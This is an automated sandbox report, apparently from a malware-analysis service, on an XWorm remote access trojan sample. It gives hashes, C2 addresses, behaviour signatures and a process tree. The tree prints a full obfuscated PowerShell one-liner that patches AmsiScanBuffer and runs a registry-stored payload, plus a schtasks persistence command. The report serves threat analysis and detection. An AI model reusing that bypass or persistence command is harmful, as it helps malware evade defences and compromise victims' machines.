Analysis

  • max time kernel
    60s
  • max time network
    62s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-07-2024 22:25

General

  • Target

    d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe

  • Size

    761KB

  • MD5

    1b767b2a4f8596b12e1e2306cb3b9939

  • SHA1

    007190828b70f2a72311e603bbb94bcb2e41b1c0

  • SHA256

    d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000

  • SHA512

    cf3bbbfe500fc752eb0d777f44d90d1d245bb5394ada49a26a0ac31d62d331324a2c49f1e14072ec446d5a1acb44e9426868af2898cdfe65effe9092bf1fa6d7

  • SSDEEP

    12288:MSJBQ/xsjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrN:MABQ/mjuTt4TbQRjDH2eJQTNqcWOVZK1

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:13576

edition-eat.gl.at.ply.gg:13576

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{46c2ea4a-e9ef-4341-a2b4-8ecf73bb93de}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3112
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:948
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:388
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:868
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:1108
              • C:\Windows\system32\taskhostw.exe
                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                2⤵
                  PID:3036
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GfDWAPegVWWI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GfjdylNKmWzFVi,[Parameter(Position=1)][Type]$xFNWMmPLXe)$RGSXfALcysy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'eT'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$RGSXfALcysy.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$GfjdylNKmWzFVi).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$RGSXfALcysy.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+'H'+''+'i'+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$xFNWMmPLXe,$GfjdylNKmWzFVi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+'a'+''+'n'+'age'+'d'+'');Write-Output $RGSXfALcysy.CreateType();}$VpNoFCEEXxUPN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'32.'+[Char](85)+'n'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$dmIKowLFQImbUL=$VpNoFCEEXxUPN.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+'l'+'ic'+[Char](44)+'S'+'t'+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BhJbsxXxmaPhAUZzCFZ=GfDWAPegVWWI @([String])([IntPtr]);$xqKWRGiwrPjGseSxJhmoSb=GfDWAPegVWWI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YKKDHGMENrc=$VpNoFCEEXxUPN.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$fVauQypgrBeZfu=$dmIKowLFQImbUL.Invoke($Null,@([Object]$YKKDHGMENrc,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+'A')));$dZOojYeWQAeSlrWQp=$dmIKowLFQImbUL.Invoke($Null,@([Object]$YKKDHGMENrc,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+'r'+'o'+[Char](116)+''+[Char](101)+'c'+'t'+'')));$tOmsLaX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fVauQypgrBeZfu,$BhJbsxXxmaPhAUZzCFZ).Invoke(''+'a'+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+'l');$iSxuWhQAQIKrjjBYH=$dmIKowLFQImbUL.Invoke($Null,@([Object]$tOmsLaX,[Object](''+'A'+''+'m'+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'e'+'r'+'')));$RnQcyuqeIv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dZOojYeWQAeSlrWQp,$xqKWRGiwrPjGseSxJhmoSb).Invoke($iSxuWhQAQIKrjjBYH,[uint32]8,4,[ref]$RnQcyuqeIv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iSxuWhQAQIKrjjBYH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dZOojYeWQAeSlrWQp,$xqKWRGiwrPjGseSxJhmoSb).Invoke($iSxuWhQAQIKrjjBYH,[uint32]8,0x20,[ref]$RnQcyuqeIv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue('x'+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4976
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    3⤵
                      PID:3916
                  • C:\Users\Admin\AppData\Roaming\x4svchost
                    C:\Users\Admin\AppData\Roaming\x4svchost
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3596
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                  • Drops file in System32 directory
                  PID:1116
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1148
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1172
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1188
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1372
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                              • Modifies registry class
                              PID:2724
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1384
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1392
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                1⤵
                                  PID:1604
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1668
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1676
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                      1⤵
                                        PID:1716
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1808
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1832
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1924
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1984
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:2024
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1744
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:2072
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2112
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2192
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2388
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2456
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          1⤵
                                                            PID:2584
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2592
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2744
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2752
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2792
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2800
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2808
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2820
                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                        1⤵
                                                                          PID:2232
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:3116
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3460
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                                PID:3544
                                                                                • C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1704
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x444.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x444.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Drops startup file
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1008
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4svchost" /tr "C:\Users\Admin\AppData\Roaming\x4svchost"
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3740
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4244
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3648
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3856
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4008
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3688
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                        1⤵
                                                                                          PID:3744
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:4448
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:4756
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2120
                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                              1⤵
                                                                                                PID:2572
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4220
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:4500
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:1692
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                      1⤵
                                                                                                        PID:4808
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3564
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4224
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4424
                                                                                                            • C:\Windows\System32\alg.exe
                                                                                                              C:\Windows\System32\alg.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in System32 directory
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1900
                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1664
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:872
                                                                                                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                              "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:1320
                                                                                                            • \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                                                                                                              "c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1944
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:3164

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

                                                                                                              Filesize

                                                                                                              2.1MB

                                                                                                              MD5

                                                                                                              832a27aaa8e2944235cc1d24037fea44

                                                                                                              SHA1

                                                                                                              1cf37ab465f9426752dcf387bc4d4987e7622bd7

                                                                                                              SHA256

                                                                                                              64bb6735b0fd40b7ca01799970a33493cf0afae407f300ed9c9c21d6cdd0b58b

                                                                                                              SHA512

                                                                                                              23c61cf874c31f70846d92e10ad9ff3830d8cd55572ecceb3aee2fd27ad2fb2b85e21387e936527979b0a303cea7c4bff6b9cb13f0d8f9ccf8246b0106645e2e

                                                                                                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                              Filesize

                                                                                                              789KB

                                                                                                              MD5

                                                                                                              66a91714c073f3ce99c7800a0d08d657

                                                                                                              SHA1

                                                                                                              a952f6c4127fb95ac44463c407b82e5accfa682c

                                                                                                              SHA256

                                                                                                              c32c21dbe78158c6373e222876928ecc58c3decd5f4b49a782d19b60753dddcf

                                                                                                              SHA512

                                                                                                              51c3b57ec1348ebaa390b4b78790aea7f0c88abbac101e1d423e9bd5622c922ee1462c98aa334bf85aa1701743050c3c444bce25f2fb94deeb5e59198daf477f

                                                                                                            • C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

                                                                                                              Filesize

                                                                                                              805KB

                                                                                                              MD5

                                                                                                              94f7438069be845d28bd8b5869c6a712

                                                                                                              SHA1

                                                                                                              9e3de5a3e34aa5a2e00ee628c17c35cb57b89553

                                                                                                              SHA256

                                                                                                              e145cef390c2249b6edf43c0704abcc7d84f5b4ca1e9402e3b29e3aa2f16d41f

                                                                                                              SHA512

                                                                                                              60bdd70f7ef98e3cfc8fee78a512c5a59b892829e8a75571bb43817aa15b3a3a7e665d7fc6101b293367ff2671aac3592e4059a5cbcf120948f9c6b8d53e5748

                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

                                                                                                              Filesize

                                                                                                              2.1MB

                                                                                                              MD5

                                                                                                              b102fa745b97d4ccf29cee08142e17c2

                                                                                                              SHA1

                                                                                                              e5f150ddb0be3eb4309d87dfa1deb9b43c45a3fe

                                                                                                              SHA256

                                                                                                              8eb1363d2f331fee4a769e0ed32a9c572a3ad491793852815e557adb6894be8b

                                                                                                              SHA512

                                                                                                              f4313413bb83c783756c881a5706998f2b504173ec5914ce4420434c46fb89b9d192f81d0ee3a1f977341908ee436803356ad2442a11940c408e900f8c548a4e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\x444.exe

                                                                                                              Filesize

                                                                                                              68KB

                                                                                                              MD5

                                                                                                              4ecf266c6f6b637370ad59ba3a49bc62

                                                                                                              SHA1

                                                                                                              9a25b7093891c031e2764bf5e2fc97bb058d3b5a

                                                                                                              SHA256

                                                                                                              d62efe4f2e5c2c65fd7cf85cb8b865538becc3c8fa41c19f4c1bb9aa538bd428

                                                                                                              SHA512

                                                                                                              7310a4b8952f57fa15cd1969475b953a740570e5c875b9c5ab3f40a86f6abc1008bb1dc313508c4ad7d55a45ef800f3d2a94ed58f71db1a5732339440177ad8a

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

                                                                                                              Filesize

                                                                                                              731KB

                                                                                                              MD5

                                                                                                              851be4e85b0f111883680e87099483a3

                                                                                                              SHA1

                                                                                                              155e19ad0d2ec4bef3ba25512b6e8bc403350ec9

                                                                                                              SHA256

                                                                                                              ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197

                                                                                                              SHA512

                                                                                                              bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

                                                                                                            • C:\Windows\System32\alg.exe

                                                                                                              Filesize

                                                                                                              661KB

                                                                                                              MD5

                                                                                                              7a8d37d8a4b7de6da98029e6dc89ddb0

                                                                                                              SHA1

                                                                                                              c8dc1e4499fec22a4e09e6e14c283bee20e5c80e

                                                                                                              SHA256

                                                                                                              801cae54589b2af8b76a8fe729ec0a54bb03cc0c71ab467add1da556fe14ced7

                                                                                                              SHA512

                                                                                                              14a146a4479754f3bac8aa7e64aab60fe5df0ae7ca7b3513eacb0282f7887b7382ec55a6364ce1619b52235f69af6df77db03fff69025e43842dfdb1f3c8a7d5

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_2nwjafro.mi0.ps1

                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • memory/872-64-0x00000000001A0000-0x0000000000200000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/872-83-0x0000000140000000-0x000000014022B000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.2MB

                                                                                                            • memory/872-70-0x00000000001A0000-0x0000000000200000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/872-1040-0x0000000140000000-0x000000014022B000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.2MB

